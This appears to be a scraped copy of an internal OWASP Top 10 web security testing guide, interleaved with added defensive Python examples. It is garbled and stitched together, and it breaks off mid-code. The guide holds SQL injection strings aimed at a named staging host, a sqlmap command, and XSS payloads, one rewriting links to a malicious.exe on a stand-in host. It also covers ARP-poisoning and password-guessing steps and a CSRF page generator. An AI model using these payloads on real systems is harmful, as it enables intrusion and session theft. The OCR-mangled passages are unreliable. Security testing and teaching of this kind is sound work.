Security Testing by OWASP Top 10


8/13/2019 Security Testing by OWASP Top 10

http://slidepdf.com/reader/full/security-testing-by-owasp-top-10 1/30


Document Management

Confidentiality: This is a Levi9 Restricted document. According to the Standards of Business Conduct, this document may not be shared outside Levi9, but it may be published on the Levi9 Intranet without further restrictions.

This document may be shared with the customer if an appropriate agreement for professional services exists.

Distribution List

To | Company / Role | Action* | Due Date | Telephone / e-mail

* Action: Approve, Review, Inform, Other (Please specify)

Document History

Version | Description | Date | Author

References

Source | Date | Author

Version 1.0 Print Date 15 Jan 2014 Page 2 of 30

Table of contents

1 About OWASP Top 10 .......... 4
1.1 A1 Injection .......... 4
1.1.1 Manual inserting SQL Injection string in the URL and fields .......... 4
1.1.2 Automated inserting SQL Injection strings in the input fields .......... 5
1.2 A2 Cross-Site Scripting (XSS) .......... 9
1.2.1 Reflected Cross Site Scripting (XSS) .......... 9
1.2.2 Stored Cross Site Scripting (XSS) .......... 9
Session .......... 10
1.2.3 Examples for Persistent XSS Attack .......... 10
1.3 A3 Broken Authentication and Session Management .......... 13
1.3.1 Manual testing of Broken Authentication and Session Management .......... 13
1.3.2 Automated testing of Broken Authentication and Session Management .......... 13
Logout and Browser Cache Management .......... 17
1.4 A4 Insecure Direct Object References .......... 18
Attacks on application platform .......... 19
Attacks on other systems .......... 19
1.5 A5 Cross-Site Request Forgery (CSRF) .......... 19
Clickjacking Test Page .......... 20
1.6 A6 Security Misconfiguration .......... 21
1.7 A7 Insecure Cryptographic Storage .......... 21
1.8 A8 Failure to Restrict URL Access .......... 22
1.9 A9 Insufficient Transport Layer Protection .......... 22
1.10 A10 Unvalidated Redirects and Forwards .......... 24
2 Damn Vulnerable Web App (DVWA) .......... 25
3 Appendix .......... 28
4 Bibliography .......... 30

1 About OWASP Top 10

The OWASP Top 10 Web Application Security Risks for 2010 are:

• A1: Injection
• A2: Cross-Site Scripting (XSS)
• A3: Broken Authentication and Session Management
• A4: Insecure Direct Object References
• A5: Cross-Site Request Forgery (CSRF)
• A6: Security Misconfiguration
• A7: Insecure Cryptographic Storage
• A8: Failure to Restrict URL Access
• A9: Insufficient Transport Layer Protection
• A10: Unvalidated Redirects and Forwards

The list above represents the most widespread vulnerabilities for 2010. Testing a web application against these OWASP Top 10 points can be performed manually or with penetration testing tools or scanners. It is best to combine manual testing with some automated testing tools. There are many free automated testing tools; this is a list of the most popular:

• WebScarab (web scanner): WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols.
• BackTrack5 (a distribution based on the Debian GNU/Linux distribution, aimed at digital forensics and penetration testing use)
• OWASP Live CD (collects some of the best open source security projects in a single environment (Linux))
• OWASP ZAP (penetration testing tool for finding vulnerabilities in web applications)

1.1 A1 Injection

Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. Injection can be tested in two ways: with a penetration testing tool, or manually by inserting a SQL injection string into the URL as a parameter or into an input or text field. There are many SQL injection strings that can be used for the attack.

1.1.1 Manual inserting SQL Injection string in the URL and fields

Perform String SQL Injection

For example, the query the application ends up executing becomes:

    SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

    http://phase2relatieplanet.staging.levi9.com/rd?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1
    http://phase2relatieplanet.staging.levi9.com/rd?user=*


7"ample $nsert follo!ing S1L in/ection strings in username and pass!ord field and submit it. orE$E G $

H or HaHGHaf application is vulnerable for S1L in/ection, attac8er !ill be logged as first user !ho e"ists inthe database.7"ample *nsert follo!ing S1L in/ection strings in username field> orE$E G $M33nsert anything in pass!ord fieldIidG3*( order by $%
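The login bypass described above, as an added example that is not code from the original document: the string-concatenated query that the injection strings rewrite, next to its parameterised replacement, run against a constructed SQLite Users table.

```python
import sqlite3


def make_db():
    """Constructed in-memory Users table with the columns from the query above.
    (Passwords are stored in clear only to keep the sample short; a real
    application stores a salted hash, see A7.)"""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by concatenation, the pattern the strings above
    exploit: a quote in the input closes the literal and the rest is parsed
    as SQL, so the WHERE clause becomes true for every row."""
    sql = ("SELECT Username FROM Users WHERE Username='" + username +
           "' AND Password='" + password + "'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        # A database error surfacing to the client is itself a finding: it is
        # what error-based and blind injection testing look for.
        return None
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Parameterised query: the driver binds the input as data, so quotes and
    OR clauses inside it cannot change the statement's structure."""
    row = conn.execute(
        "SELECT Username FROM Users WHERE Username=? AND Password=?",
        (username, password)).fetchone()
    return row[0] if row else None


def demo():
    conn = make_db()
    probe = "' or 'a'='a"
    return {
        "vulnerable": login_vulnerable(conn, probe, probe),  # "alice": first row wins
        "fixed": login_fixed(conn, probe, probe),            # None: no such user
        "fixed_legit": login_fixed(conn, "bob", "hunter2"),  # "bob"
    }
```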

1.1.2 Automated inserting SQL Injection strings in the input fields

For automated SQL injection testing one of the best tools is Mantra. Mantra is one of the many BackTrack5 penetration testing tools. It is also possible to install Mantra as a standalone application (without BackTrack5).

Start the Mantra standalone application, select Tools > Application Auditing, and choose "SQL Inject Me". Open the sidebar and select which SQL injection string you want to test on a specific input field. Start the test by pressing the "Execute" button. There is an option to test all forms on the page with all attacks or with the top attacks by pressing the "Test all forms with all attacks" or "Test all forms with top attacks" button. Mantra also offers the possibility to add custom SQL injection strings; this is done in the Options section. It is also possible to import SQL injection strings from an .xml file.


XML Injection

XML injection is possible only if the application relies on XML (for instance, stores information in an XML DB). Let us suppose we have the following XML DB file (the information is stored in XML):

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <users>
      <user>
        <username>gandalf</username>
        <password>!c3</password>
        <userid>0</userid>
        <mail>gandalf@middleearth.com</mail>
      </user>
      <user>
        <username>Stefan0</username>
        <password>w1s3c</password>
        <userid>500</userid>
        <mail>Stefan0@whysec.hmm</mail>
      </user>
    </users>

Tool for testing XML injection: XPath Blind Explorer (http://code.google.com/p/xpath-blind-explorer/downloads/list)
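Added example, not from the original document, showing why the users file above must never be extended by string formatting: the same record is appended once by text substitution and once through the XML API, using a constructed input that carries markup (the XML declaration is omitted from the sample).

```python
import xml.etree.ElementTree as ET

# The users file from the page, as a constructed sample (declaration omitted).
USERS_XML = """<users>
  <user><username>gandalf</username><password>!c3</password><userid>0</userid><mail>gandalf@middleearth.com</mail></user>
  <user><username>Stefan0</username><password>w1s3c</password><userid>500</userid><mail>Stefan0@whysec.hmm</mail></user>
</users>"""


def add_user_unsafe(xml_text, username, password, userid, mail):
    """Builds the record with string formatting. Markup characters in any
    field become part of the document, so the caller controls its structure."""
    record = ("<user><username>%s</username><password>%s</password>"
              "<userid>%s</userid><mail>%s</mail></user>"
              % (username, password, userid, mail))
    return xml_text.replace("</users>", record + "</users>")


def add_user_safe(xml_text, username, password, userid, mail):
    """Builds the record through the XML API. Element text is serialised with
    < > & escaped, so the input is stored verbatim as text, never as markup."""
    root = ET.fromstring(xml_text)
    user = ET.SubElement(root, "user")
    for tag, value in (("username", username), ("password", password),
                       ("userid", str(userid)), ("mail", mail)):
        ET.SubElement(user, tag).text = value
    return ET.tostring(root, encoding="unicode")


def list_users(xml_text):
    """Reads the file back the way the application would: (username, userid)."""
    root = ET.fromstring(xml_text)
    return [(u.findtext("username"), u.findtext("userid"))
            for u in root.findall("user")]
```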

Blind SQL injection

A web site might be vulnerable to blind SQL injection if the id of the page is exposed in the URL.

Blind SQL injection is used when a web application is vulnerable to SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data, but it will display differently depending on the result of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information have been established. The first thing is to check whether the targeted page with an id in the URL is vulnerable or not:

1. Go to the targeted page, e.g. http://www.fakebookreviewer.com/showReview.php?ID=5. The following query will be executed:

    SELECT * FROM bookreviews WHERE ID ='5';

2. From this it would populate the review page with data from the review with ID = 5, stored in the table bookreviews. The query happens completely on the server; the user does not know the names of the database, table, or fields, nor does the user know the query string. The user only sees that the above URL returns a book review. A hacker can load the URLs http://www.fakebookreviewer.com/showReview.php?ID=5 AND 1=1 and http://www.fakebookreviewer.com/showReview.php?ID=5 AND 1=2, which may result in the queries:

    SELECT * FROM bookreviews WHERE ID = '5' AND '1'='1';
    SELECT * FROM bookreviews WHERE ID = '5' AND '1'='2';

respectively. If the original review loads with the "1=1" URL and a blank or error page is returned from the "1=2" URL, the site is likely vulnerable to a SQL injection attack. The hacker may proceed with this query string, designed to reveal the version number of MySQL running on the server:

    http://www.fakebookreviewer.com/showReview.php?ID=5 AND substring(@@version,1,1)=4

which would show the book review on a server running MySQL 4 and a blank or error page otherwise. The hacker can continue to use code within query strings to glean more information from the server until another avenue of attack is discovered or his or her goals are achieved.

So, the point is that the web application does not return any information to the attacker after executing the SQL queries.

Blind SQL injection is called "blind" because the attacker does not have any information about the application and database; the attacker tries to guess the user name and password by inserting malicious code, using the information obtained from error messages.[1]

[1] Reference: http://en.wikipedia.org/wiki/SQL_injection ; http://www.securiteam.com/securityreviews/5DP0N1P76E.html

Union Query SQL Injection

    http://www.example.com/product.php?id=10 ORDER BY 10--

    python sqlmap.py -v --url=http://10.1.1.33/dvwa/vulnerabilities/sqli --user-agent=SQLMAP --delay=1 --timeout=15 --retries= --keep-alive --threads=5 --eta --batch --dbms=MySQL --os=Linux --level=5 --risk=3 --banner --is-dba --dbs --tables --technique=BEUST

1.2 A2 Cross-Site Scripting (XSS)

1.2.1 Reflected Cross Site Scripting (XSS)

1.2.1.1 Manual testing of Cross-Site Scripting (XSS)

Manual testing of Cross-Site Scripting means that every input or text field and every URL of the web application should be tested by inserting some malicious script. Reflected Cross-site Scripting (XSS) is another name for non-persistent XSS, where the attack doesn't load with the vulnerable web application but is originated by the victim loading the offending URI.

In the case of a non-persistent attack or Reflected Cross Site Scripting, the user has to visit a link specially crafted by the attacker. When the user visits the link, the crafted code will get executed by the user's browser.

<or e"ample>

Attac8er created 2RL and sends it to the victim 4i.e. http> visitme.com 6, !hen victim clic8 onthis lin8 malicious code !ill be e"ecuted and attac8er can steal session from victim.

<or e"ample>

http> phase*relatieplanet.staging.levi9.com rdIuserG script alert4$* 6 script

http> phase*relatieplanet.staging.levi9.com rdIuserG script !indo!.onload G function46 Uvar AllLin8sGdocument.get7lementsByTag ame4PaP6MAllLin8sV%W.hrefGPhttp> bade"ample.com malicious.e"ePM X script

7nter follo!ing /avascript code in the input field> script alert4document.coo8ie6M script and submit itto the server.This is a fe! e"amples of inserting 5SS into 2RL *

http> phase*relatieplanet.staging.levi9.com rd searchI

actionGsounde"KfirstnameG script alert4document.coo8ie6 scripthttp> phase*relatieplanet.staging.levi9.com rd ?oe8en uitgebreid3?oe8en IactionG script alert4document.coo8ie6 script
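Added example, not from the original document: the `user` and `firstname` parameters from the links above reflected into a page twice, once as-is and once encoded for the context each value lands in (element text and a quoted attribute), plus the check a tester applies to the captured response. The page template is constructed.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed response template: a greeting (text context) and a search form
# whose field echoes the submitted value (attribute context).
PAGE = "<html><body><h1>Hello, {user}</h1>{form}</body></html>"
FORM = '<form action="/rd/search"><input name="firstname" value="{value}"></form>'


def user_from_url(url):
    """Takes the `user` query parameter from a link like those above, URL-decoded
    the way the server framework would hand it to the page."""
    return parse_qs(urlsplit(url).query).get("user", [""])[0]


def render_vulnerable(user, firstname=""):
    """Reflects both inputs unchanged: whatever the link carried becomes markup
    and the browser runs it in the origin of the site."""
    return PAGE.format(user=user, form=FORM.format(value=firstname))


def render_fixed(user, firstname=""):
    """Encodes per context. In element text < > & must be escaped; inside a
    double-quoted attribute the quote must be escaped too (quote=True turns
    '"' into &quot;), otherwise the value can close the attribute and add
    event handlers."""
    return PAGE.format(user=html.escape(user, quote=False),
                       form=FORM.format(value=html.escape(firstname, quote=True)))


def reflected_unencoded(response_html, probe):
    """Tester's check on a captured response: did the probe come back byte for
    byte, i.e. as live markup, rather than as escaped text?"""
    return probe in response_html
```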

1.2.2 Stored Cross Site Scripting (XSS)

Stored Cross-site Scripting (XSS) is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios.

[2] Reference: http://theinsider.deep-ice.com/texts/xss_exposed.txt

In the case of a persistent attack, the code injected by the attacker is stored in secondary storage (mostly in a database).

Stored XSS does not need a malicious link to be exploited. A successful exploitation occurs when a user visits a page with a stored XSS. The following phases relate to a typical stored XSS attack scenario:

• Attacker stores malicious code into the vulnerable page
• User authenticates in the application
• User visits the vulnerable page
• Malicious code is executed by the user's browser

For example: the attacker inserts some malicious code on the vulnerable page and saves it. This malicious code is stored in the database. When another user visits the attacker's page the malicious code will be executed.

Session

HTTP is a stateless protocol, which means it won't maintain any state with regard to the request and response. All requests and responses are independent of each other. But most web applications don't want this: once the user has authenticated, the web server should not ask for the username/password again on the user's next request. To achieve this, some kind of state has to be maintained between the web browser and the web server, which is done through "Sessions".

When the user logs in for the first time, a session ID is created by the web server and sent to the web browser as a "cookie". All subsequent requests to the web server are based on the "session id" in the cookie.

1.2.3 Examples for Persistent XSS Attack

The sample web application given below that demonstrates the persistent XSS attack does the following:

Go to some page with input or text fields, enter malicious code and save. The malicious code is now stored in the database.


1.2.3.1 Automated testing of Cross-Site Scripting (XSS)

Run the Mantra "XSS Me" tool as a standalone application or run it in BackTrack5. Select the fields you want to test, choose an XSS string and press the Execute button, or just press the "Test all forms with all attacks" button to test all forms on the page with all XSS strings defined in the Options section. It is possible to add more XSS strings in the Options section.


DOM based XSS fault

The DOM, or Document Object Model, is the structural format that may be used to represent documents in the browser. The DOM enables dynamic scripts such as JavaScript to reference components of the document such as a form field or a session cookie. When an attacker enters an img tag in an input field and submits it, and the application is not secure, there is a possibility of defacing the website (the layout of the page will be broken).

For example: find a URL that points to some image (the easiest way is to select the image and use "copy link location"), enter the following in the input field and submit:

    <img src="http://[image host]/4242/relatieplanet/memberimages/thb.JPG">

1.3 A3 Broken Authentication and Session Management

1.3.1 Manual testing of Broken Authentication and Session Management

Authentication and session management includes all aspects of handling user authentication and managing active sessions. Authentication is a critical aspect of this process, but even solid authentication mechanisms can be undermined by flawed credential management functions, including password change, forgot my password, remember my password, account update, and other related functions. Because "walk by" attacks are likely for many web applications, all account management functions should require reauthentication even if the user has a valid session id.

Example:

A site's user should not be able to see protected content of the site if he/she is not authorized to see it. So, the user passes authentication, but if he/she is not authorized to see something on the site, the application should not allow him/her to see this content.

User A has permission to see some image or document, but user B does not have that permission (not logged in), so if user A sends a URL with the session ID to user B, he/she should not be able to see it.

What should be checked? This is the list:

1. Are credentials always protected when stored, using hashing or encryption?
2. Can credentials be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs)?
3. Are session IDs exposed in the URL (e.g., URL rewriting)?
4. Are session IDs vulnerable to session fixation attacks?
5. Do session IDs time out and can users log out?
6. Are session IDs rotated after successful login?
7. Are passwords, session IDs, and other credentials sent only over TLS connections?

1.3.2 Automated testing of Broken Authentication and Session Management

From the main menu select the following:


BackTrack > Privilege Escalation > Sniffers > Network Sniffers > ettercap-gtk

• Find the etter.conf file; it is located in the etc folder (/etc/etter.conf). Edit it, find the Linux section for "iptables" in this file and remove the # sign from these two lines:

    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

• Open ettercap-gtk, click on Sniff, choose Unified sniffing, select the network interface from the list (e.g. eth1) and click OK
• Go to Hosts and click on Scan for hosts, then go to the Host list, select the wanted host from the list and click on Add to Target 1, select another and click on Add to Target 2
• Choose Mitm from the menu and click on Arp poisoning, select Sniff remote connections. Choose Start and click on Start sniffing. To check whether the poisoning succeeded, go to Plugins and open Manage the plugins

From the main menu select the following:

BackTrack > Privilege Escalation > Password Attacks > gtk-hydra

Now, open the browser on the victim machine (the machine from the host list that was poisoned)

Default or guessable (dictionary) user account

Try the following usernames: "admin", "administrator", "root", "system", "guest", "operator", or "super". These are popular among system administrators and are often used. Additionally you could try "qa", "test", "test1", "testing" and similar names. Attempt any combination of the above in both the username and the password fields. If the application is vulnerable to username enumeration, and you successfully manage to identify any of the above usernames, attempt passwords in a similar manner. In addition, try an empty password or one of the following: "password", "pass123", "password123", "admin", or "guest" with the above accounts or any other enumerated accounts. Further permutations of the above can also be attempted. If these passwords fail, it may be worth using a common username and password list and attempting multiple requests against the application. This can, of course, be scripted to save time.

Brute Force

Dictionary Attack

Dictionary-based attacks consist of automated scripts and tools that will try to guess usernames and passwords from a dictionary file. A dictionary file can be tuned and compiled to cover words probably used by the owner of the account that a malicious user is going to attack. The attacker can gather information (via active/passive reconnaissance, competitive intelligence, dumpster diving, social engineering) to understand the user, or build a list of all unique words available on the website.

Reference: https://www.owasp.org/index.php/Testing_for_Default_or_Guessable_User_Account_%28OWASP-AT-003%29


Start the OWASP ZAP tool

Select Brute Force, select the site, choose a directory-list file from the dropdown box and press Play. It is possible to create your own directory-list.

Bypassing authentication schema

• Direct page request (forced browsing)
• Parameter Modification
• Session ID Prediction

Direct page request (forced browsing)

If a web application implements access control only on the login page, the authentication schema could be bypassed. For example, if a user directly requests a different page via forced browsing, that page may not check the credentials of the user before granting access. Attempt to directly access a protected page through the address bar in your browser to test using this method.

Try with this: http://somesite.com/users/Administrator

Parameter Modification

If the user is not authenticated, the parameter in the URL will be: http://somesite/homepage.jsp?authenticated=no

Type this in the browser:

http://somesite/homepage.jsp?authenticated=yes

Session ID Prediction

Many web applications manage authentication using session identification values (SESSION ID). Therefore, if session ID generation is predictable, a malicious user could be able to find a valid session ID and gain unauthorized access to the application, impersonating a previously authenticated user. In the following figure, the values inside the cookies increase linearly, so it could be easy for an attacker to guess a valid session ID.


This is not correct; the distribution of cookie values over time must be dispersed, otherwise there is a possibility that an attacker predicts a session ID.

To check this, start WebScarab, open the Session ID Analysis tab, select Request, enter the number of samples and press Test. Click on the Fetch button and after that go to the Analysis tab. Select the session identifier. Repeat this action for different requests in order to get a diagram of cookie values over time.
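Added example, not from the original document, covering the Session description and the Session ID Prediction check above: the same analysis WebScarab plots (are consecutive cookie values a constant step apart?) applied to two constructed sets of session IDs, a counter and IDs drawn from a CSPRNG, together with a rough entropy estimate from the sample's alphabet and length.

```python
import math
import secrets


def sequential_ids(start=1000, count=6):
    """Constructed sample of the weak scheme the figure showed: a counter."""
    return [str(start + i) for i in range(count)]


def random_ids(count=6, nbytes=16):
    """What a server should issue: IDs from a CSPRNG (here 128 bits each)."""
    return [secrets.token_urlsafe(nbytes) for _ in range(count)]


def _as_int(session_id):
    # Numeric cookies compare directly; other IDs are read as big-endian integers
    # so differences between consecutive samples can still be computed.
    if session_id.isdigit():
        return int(session_id)
    return int.from_bytes(session_id.encode("ascii"), "big")


def analyze(ids):
    """Mirrors the WebScarab Session ID Analysis tab: if successive values differ
    by a constant step the next ID is one guess away. The entropy estimate
    (characters seen x log2 of alphabet size) is a ceiling, not a measurement:
    a small value proves weakness, a large one only fails to."""
    values = [_as_int(s) for s in ids]
    diffs = [b - a for a, b in zip(values, values[1:])]
    linear = len(diffs) > 0 and len(set(diffs)) == 1
    alphabet = len(set("".join(ids)))
    estimated_bits = len(ids[0]) * math.log2(alphabet) if alphabet > 1 else 0.0
    return {
        "linear": linear,
        "step": diffs[0] if linear else None,
        "estimated_bits": round(estimated_bits, 1),
        "weak": linear or estimated_bits < 64,
    }
```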


Logout and Browser Cache Management

In this test case, we check that the logout function is properly implemented, and that it is not possible to "reuse" a session after logout. We also check that the application automatically logs out a user when that user has been idle for a certain amount of time, and that no sensitive data remains stored in the browser cache. Only one cookie should exist to store session info.

Check the following:

• session ID & cookies
• a cookie is data stored on the client (the recommendation is a session cookie instead of a persistent cookie)
• when the browser is closed, temporary cookies (session cookies) should be erased
• a session's data is stored on the server (only 1 session per client)
• the only data the client stores is a cookie holding a unique session ID
• on each page request, the client sends its session ID cookie, and the server uses this to find and retrieve the client's session data

Check reset password

Password Reset

The first step is to check whether secret questions are used. Sending the password (or a password reset link) to the user's email address without first asking for a secret question means relying 100% on the security of that email address, which is not suitable if the application needs a high level of security.

• Check: are there multiple questions offered?
• Check: does the password reset allow unlimited attempts?
• Check: does the password-reset tool display the old password?
• Check: does it email the password to some pre-defined email address?
• Display a Captcha code after successful verification of the username and/or security question
• Send a link to the user's registered email address. The link should have a random token associated with it.
• The link should be short-lived, one-time use only and SSL enabled.
• Once the user resets the password, the link should no longer be usable.
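Added example, not from the original document, implementing the last three items of the reset checklist: a random token that is short-lived and single-use, stored only as a hash, delivered in an HTTPS link. The 15 minute lifetime and the host name are assumptions; limiting attempts on the secret question is a separate control not shown here.

```python
import hashlib
import secrets
import time

TOKEN_TTL = 15 * 60  # seconds; assumed policy value


class ResetTokens:
    """Issues and redeems password-reset tokens that are random, short-lived
    and single-use, as the checklist above requires."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._pending = {}  # sha256(token) -> (user, expires_at)

    def issue(self, user):
        token = secrets.token_urlsafe(32)          # 256 random bits
        self._pending[self._digest(token)] = (user, self._clock() + TOKEN_TTL)
        return token                               # travels only in the e-mail link

    def redeem(self, token):
        """Returns the user the token belongs to, or None. pop() removes the
        entry on the first use, so a replayed link fails even if the first
        redemption happened a moment ago."""
        entry = self._pending.pop(self._digest(token), None)
        if entry is None:
            return None
        user, expires_at = entry
        if self._clock() > expires_at:
            return None
        return user

    @staticmethod
    def _digest(token):
        # Only the hash is stored: a leaked table cannot be turned into working links.
        return hashlib.sha256(token.encode("ascii")).hexdigest()


def reset_link(token):
    """Assumed host; the reset page must be served over HTTPS only."""
    return "https://www.example.test/reset?token=" + token
```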

Password Remember

If the password is stored in a permanent cookie, then the password must be hashed/encrypted and not sent in the clear.

Check if the session is refreshed

After killing the browser or deleting cookies and cache in the browser, the current session must be terminated; if not, we have a security issue.
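Added example, not from the original document, for the logout, idle-timeout and session-ID checks above (list items 5 and 6 and the "Check the following" bullets): a server-side session store that rotates the ID at login, forgets idle sessions, invalidates on logout so the ID cannot be reused, and issues the cookie as a session cookie. The 15 minute idle limit is an assumed policy value.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60   # seconds of inactivity before the server drops a session (assumed)


class SessionStore:
    """Server-side session table: the client only ever holds an opaque ID."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}   # session id -> {"user": ..., "last_seen": ...}

    def _new(self, user):
        sid = secrets.token_urlsafe(32)            # 256 random bits, never a counter
        self._sessions[sid] = {"user": user, "last_seen": self._clock()}
        return sid

    def start_anonymous(self):
        return self._new(None)

    def login(self, old_sid, user):
        """Rotates the ID at authentication (checklist item 6): an ID handed out
        before login, possibly planted by a fixation attack, stops working."""
        self._sessions.pop(old_sid, None)
        return self._new(user)

    def current_user(self, sid):
        """Resolves a presented cookie. Idle sessions are dropped here, so a
        stale ID cannot be 'reused' later (checklist item 5)."""
        session = self._sessions.get(sid)
        if session is None:
            return None
        if self._clock() - session["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[sid]
            return None
        session["last_seen"] = self._clock()
        return session["user"]

    def logout(self, sid):
        """Server-side invalidation: clearing the cookie alone would leave the
        session alive for anyone who captured the ID."""
        self._sessions.pop(sid, None)


def session_cookie_header(sid):
    """No Expires/Max-Age, so the browser discards it on close (a session
    cookie); Secure and HttpOnly keep it off plain HTTP and away from scripts."""
    return "Set-Cookie: SESSIONID=%s; Path=/; Secure; HttpOnly; SameSite=Lax" % sid
```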

1.4 A4 Insecure Direct Object References

The best way to find out if an application is vulnerable to insecure direct object references is to verify that all object references have appropriate defenses. To achieve this, consider:

1. For direct references to restricted resources, the application needs to verify the user is authorized to access the exact resource they have requested.
2. If the reference is an indirect reference, the mapping to the direct reference must be limited to values authorized for the current user.

For example: user A is authenticated on the site but doesn't have permission to see some parts of the site. So, when user A tries to access some forbidden area, the application must check whether he/she is authorized to see the hidden content. If he/she is not authorized, the application must prevent him/her from seeing the hidden content.

An attacker who is an authorized system user simply changes a parameter value that directly refers to a system object to another object the user isn't authorized for. This behavior must be prevented.

The best way of testing for this type of vulnerability is manual testing or code review.
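Added example, not from the original document, implementing the two defenses listed above against a constructed document store: an ownership check on the exact object for direct references, and a per-user map of opaque handles for indirect references.

```python
import secrets


class Forbidden(Exception):
    """Raised for any reference the current user may not use."""


# Constructed object store keyed by the direct (database) id the page talks about.
DOCUMENTS = {
    101: {"owner": "alice", "body": "alice's contract"},
    102: {"owner": "bob",   "body": "bob's invoice"},
    103: {"owner": "alice", "body": "alice's photo"},
}


def get_document_direct(user, doc_id):
    """Defense 1: the direct id is accepted from the request, but ownership of
    exactly that object is checked on every access. Missing and foreign
    objects get the same answer, so the id is not an existence oracle."""
    doc = DOCUMENTS.get(doc_id)
    if doc is None or doc["owner"] != user:
        raise Forbidden("document %r is not available to %s" % (doc_id, user))
    return doc["body"]


class IndirectReferences:
    """Defense 2: per-user opaque handles. The map is built only from objects
    the user is authorised for, so any handle not in it resolves to nothing,
    and a handle copied from another user's page is meaningless here."""

    def __init__(self, user):
        self.user = user
        self._handle_to_id = {}
        for doc_id, doc in DOCUMENTS.items():
            if doc["owner"] == user:
                self._handle_to_id[secrets.token_urlsafe(8)] = doc_id

    def handles(self):
        """The values that may appear in this user's links and forms."""
        return sorted(self._handle_to_id)

    def resolve(self, handle):
        doc_id = self._handle_to_id.get(handle)
        if doc_id is None:
            raise Forbidden("unknown reference for %s" % self.user)
        return DOCUMENTS[doc_id]["body"]
```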

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Start the OWASP ZAP tool (make sure that the proxy is configured in the browser). Navigate through the site; all traffic goes via the proxy and OWASP ZAP intercepts all requests and responses. From the tree, select which page and which method you want to test (GET or POST). From the Request tab select the URL, right click and click on "Fuzz ...". From the Fuzz Category choose Path Traversal and click on the Fuzz button to start testing.
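Added example, not from the original document: the server-side mapping that makes the path traversal fuzzing above come back empty. A requested path is decoded once, double encoding and NUL bytes are refused, and the canonical result must stay inside the base directory. The probe strings and the base directory are constructed.

```python
import os
from urllib.parse import unquote


def safe_resolve(base_dir, requested):
    """Maps a client-supplied relative path onto base_dir. Returns the absolute
    path to serve, or None when the request would leave base_dir. Decoding is
    done exactly once: a '%' surviving it means double encoding and is refused."""
    decoded = unquote(requested)
    if "%" in decoded or "\x00" in decoded:
        return None
    # Treat backslashes as separators and a leading slash as relative to the base.
    decoded = decoded.replace("\\", "/").lstrip("/")
    base = os.path.realpath(base_dir)
    # realpath collapses '..' segments and follows symlinks, so the containment
    # check below sees the directory that would actually be opened.
    candidate = os.path.realpath(os.path.join(base, decoded))
    if candidate != base and not candidate.startswith(base + os.sep):
        return None
    return candidate


# Constructed probes of the kind a Path Traversal fuzzer sends, plus two
# legitimate paths, used to show which requests the mapping refuses.
PROBES = [
    "images/thb.jpg",
    "a/../b.txt",
    "../../../etc/passwd",
    "..%2F..%2Fetc%2Fpasswd",
    "%252e%252e/%252e%252e/etc/passwd",
    "images/../../secret.txt",
    "..\\..\\windows\\win.ini",
    "images/thb.jpg%00.png",
]


def check_probes(base_dir="/var/www/uploads"):
    """Returns {probe: served?} for the list above."""
    return {p: safe_resolve(base_dir, p) is not None for p in PROBES}
```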


Unrestricted Upload of File with Dangerous Type

The web application allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment.

Attacks on application platform

Check the following:
• Upload .jsp file into web tree - jsp code executed as web user
• Upload .gif to be resized - image library flaw exploited
• Upload huge files - file space denial of service
• Upload file using malicious path or name - overwrite critical file
• Upload file containing personal data - other users access it
• Upload file containing "tags" - tags get executed as part of being "included" in a web page

Attacks on other systems

Check the following:
• Upload .exe file into web tree - victims download trojaned executable
• Upload virus infected file - victims' machines infected
• Upload .html file containing script - victim experiences Cross-site Scripting (XSS)

1.5 A5 Cross-Site Request Forgery (CSRF)

Besides XSS and Injection, CSRF is the most common vulnerability on web sites. Consider anyone who can trick your users into submitting a request to your website. Any website or other HTML feed that your users access could do this.

For example: the attacker creates forged HTTP requests and tricks a victim into submitting them via image tags, XSS, or numerous other techniques. If the user is authenticated, the attack succeeds.

How to create a forged page with an image tag?

First, download the Piñata CSRF tool from http://code.google.com/p/pinata-csrf-tool/downloads/list

1. Install Python
2. Unzip the Piñata tool
3. Start some scanner tool (WebScarab, Paros or something similar). With this tool the attacker intercepts an HTTP GET request, and this request will be used for creating the forged page with the img tag.
4. Go to the vulnerable site and perform some action (in this case as the attacker)
5. Copy the HTTP request
6. Paste it into the CSRFBody.txt file


7. Open a command line, go to the Pinata folder and run the pinata.py file

8. Check the folder where you unzipped the Pinata tool; an .html file should have been created there

9. This html file has an img tag with the malicious code in its body.

10. Open this html file in a new browser. If the application is not safe, every time the user reloads the page or clicks on a link that leads to the malicious page, the code will be executed, because the browser automatically starts loading the images on the page.

11. If the application is safe against CSRF attacks, nothing will happen.
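The server-side check that decides whether step 10 or step 11 happens, added here as an example (it is not part of the original document or of the Piñata tool); the site origin, the endpoint paths and the plain-dict request and session objects are constructed for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://www.example.com"             # constructed: the protected site
STATE_CHANGING = {"/change_password", "/transfer"}  # constructed endpoint paths

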